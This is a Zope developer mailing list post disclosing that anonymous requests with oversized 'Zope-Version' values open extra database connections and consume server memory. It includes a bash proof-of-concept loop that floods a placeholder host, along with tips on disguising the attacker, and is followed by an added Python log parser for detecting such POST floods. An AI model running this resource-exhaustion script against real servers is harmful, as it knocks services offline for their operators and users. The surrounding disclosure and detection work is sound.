Oliver Bleutgen wrote:
> 2. Zope doesn't care if a corresponding Version instance to the value
> of REQUEST['Zope-Version'] exists, more exactly, zope doesn't care for
> the value of that Zope-Version variable at all.

Hmm, it doesn't care, but it does store it in memory. Pardon my fugly
non-portable bashisms here, but I just wanted to hash out an example:

    #!/path/to/bash
    exec >/dev/null
    h='http://victim.example.com/'
    for i in `seq 100`; do
        w3m -dump -post <(perl -e 'print "Zope-Version=",$ARGV[0]x500000' $i) "$h"
    done

Quick way to add 100 zodb connections and ~90M to the memory footprint
with relatively little clue of who is responsible, assuming traditional
logging; presumably one would get much trickier if they really wanted to
obfuscate the source of attack, slowly crawling the site, changing the
user-agent string, etc. Under sane resource limits the host is spared;
however, the /Control_Panel/Database/manage_cacheParameters resource
becomes unavailable due to memory constraints. Other side-effects from
allowing anonymous clients to open additional zodb connections are as of
yet unknown to me; anyone care to speculate on other vectors of abuse?

--
Jamie Heilman                     http://audible.transient.net/~jamie/
"We must be born with an intuition of mortality. Before we know the words
for it, before we know there are words, out we come bloodied and squalling
with the knowledge that for all the compasses in the world, there's only
one direction, and time is its only measure." -Rosencrantz

_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
http://mail.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists -
 http://mail.zope.org/mailman/listinfo/zope-announce
 http://mail.zope.org/mailman/listinfo/zope )
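One way an operator could spot the repeated-POST pattern described in the message above from ordinary access logs, as an added example that is not part of the original thread or of Zope itself. It assumes NCSA combined-format lines (as a front-end proxy would write them); the sample lines, addresses and user agents are constructed, and the source address rather than the User-Agent string is used as the key.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (NCSA combined format); addresses,
# times and agents are made up. The first client rotates its User-Agent.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2003:10:00:01 +0000] "POST / HTTP/1.0" 200 512 "-" "w3m/0.4.1"
198.51.100.2 - - [12/Mar/2003:10:00:01 +0000] "GET /index_html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2003:10:00:03 +0000] "POST / HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2003:10:00:04 +0000] "POST / HTTP/1.0" 200 512 "-" "Lynx/2.8"
198.51.100.2 - - [12/Mar/2003:10:00:09 +0000] "POST /login_form HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2003:10:00:59 +0000] "POST / HTTP/1.0" 200 512 "-" "w3m/0.4.1"
203.0.113.7 - - [12/Mar/2003:10:05:00 +0000] "POST / HTTP/1.0" 200 512 "-" "w3m/0.4.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
    r'[^"]*" (?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """Return (ip, timestamp, method, path, user_agent), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return m['ip'], ts, m['method'], m['path'], m['ua']

def flag_post_floods(lines, threshold=3, window=timedelta(seconds=60)):
    """Return {ip: (peak POSTs inside any `window`, user agents seen)} for
    every source address that reached `threshold` POSTs within one window."""
    posts = defaultdict(list)
    agents = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        ip, ts, method, _path, ua = rec
        if method == 'POST':
            posts[ip].append(ts)
            agents[ip].add(ua)
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = (peak, agents[ip])
    return flagged
```

Keying on the address means a rotating user-agent string does not split the count; the fourth POST from 203.0.113.7 lands 58 seconds after the first, so it is still inside the window, while the one five minutes later is not.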